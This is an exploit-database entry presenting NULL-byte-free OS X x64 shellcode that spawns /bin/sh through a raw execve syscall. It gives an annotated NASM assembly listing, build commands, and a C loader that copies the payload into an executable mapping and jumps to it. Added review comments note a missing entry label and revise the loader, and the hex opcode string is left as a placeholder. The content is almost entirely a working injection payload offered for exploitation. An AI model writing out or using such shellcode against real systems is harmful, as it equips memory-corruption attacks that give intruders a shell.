OS X x64 /bin/sh Shellcode, NULL Byte Free - 34 bytes

ID 1337DAY-ID-24188
Type zdt
Reporter Fitzl Csaba
Modified 2015-09-02T00:00:00


Exploit for os-x/x86 platform in category shellcode

[*] Author: Csaba Fitzl, @theevilbit
[*] Tested on OS X 10.10.5
[*] OS X x64 /bin/sh shellcode, NULL byte free, 34 bytes
[*] Assembly version
[*] binsh-shellcode.asm
[*] ./nasm -f macho64 binsh-shellcode.asm
[*] ld -macosx_version_min 10.7.0 -o binsh-shellcode binsh-shellcode.o 
global start
section .text
; execve("//bin/sh", NULL, NULL) through a raw XNU syscall: RAX carries the
; BSD syscall-class prefix 0x2000000 OR'ed with 59 (execve).  The register
; setup below avoids 0x00 bytes in the encoding, which is the "NULL byte
; free" property claimed in the title; rewriting any instruction changes the
; emitted bytes.
; NOTE(review): `global start` is declared but no `start:` label appears in
; this listing -- if it was dropped in transcription, ld will report an
; undefined symbol.  The label itself emits no bytes.
    xor     rsi,rsi                 ;RSI = 0: the argv argument, and the value pushed next
    push    rsi                     ;8 zero bytes on the stack: terminator for the string pushed below
    mov     rdi, 0x68732f6e69622f2f ;"//bin/sh" as a little-endian qword (the leading "//" pads to 8 bytes, so no NUL in the immediate)
    push    rdi                     ;string now sits directly below the zero qword
    mov     rdi, rsp                ;RDI = pointer to the NUL-terminated "//bin/sh" (path argument)
    xor     rdx, rdx                ;RDX = 0: the envp argument
    ;build the syscall number in RAX without a 0x00 byte in any immediate
    xor     rax,rax                 ;RAX = 0
    mov     al,2                    ;RAX = 0x0000000000000002
    ror     rax, 0x28               ;rotate right by 40 -> RAX = 0x0000000002000000 (BSD class bits)
    mov     al,0x3b                 ;low byte = 0x3b = 59 (execve) -> RAX = 0x000000000200003b
    syscall                         ;invoke execve; does not return on success
[*] C version
[*] Get the hex opcodes from the object file: otool -t binsh-shellcode.o
[*] binsh-shellcode.c
[*] Compile: gcc binsh-shellcode.c -o sc
[*] Run: ./sc
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
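/* Function-pointer view of the executable mapping; assigned by main(). */
int (*sc)();

/* PLACEHOLDER: the 34 opcode bytes are not reproduced on this page.  Replace
 * the string below with the hex from `otool -t binsh-shellcode.o` written as
 * "\x..\x.." escapes.  Note that a string literal appends a trailing NUL, so
 * sizeof shellcode is one more than the payload length. */
char shellcode[] = "<PLACEHOLDER_SHELLCODE_BYTES>";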
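/*
 * Test loader: copies the `shellcode` byte array into an anonymous mapping
 * and jumps to it through the file-scope pointer `sc`.
 *
 * Fixes relative to the original listing: the mapping was a fixed 0x22
 * bytes while memcpy copied sizeof(shellcode), which for a string literal
 * is one byte more (the trailing NUL); the MAP_FAILED branch had no body;
 * and the region was mapped writable and executable at once.  Here the
 * mapping is sized from the array, setup failures are reported, and the
 * page is switched from RW to RX before the jump so no W+X mapping exists.
 *
 * argc/argv are unused.  Returns 1 on an mmap/mprotect failure, 0 if the
 * payload returns.  For the execve payload listed above, a successful
 * syscall replaces the process, so control comes back here only on failure.
 */
int main(int argc, char **argv) {
    (void)argc;
    (void)argv;
    size_t len = sizeof shellcode;

    /* Writable first: the copy happens before the page becomes executable. */
    void *ptr = mmap(0, len, PROT_READ | PROT_WRITE,
                     MAP_ANON | MAP_PRIVATE, -1, 0);
    if (ptr == MAP_FAILED) {
        perror("mmap");
        return 1;
    }
    memcpy(ptr, shellcode, len);

    /* Drop write before execute (W^X).  mprotect operates on whole pages,
     * so a sub-page len is rounded up by the kernel. */
    if (mprotect(ptr, len, PROT_READ | PROT_EXEC) != 0) {
        perror("mprotect");
        munmap(ptr, len);
        return 1;
    }

    sc = ptr;
    sc();
    munmap(ptr, len);
    return 0;
}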
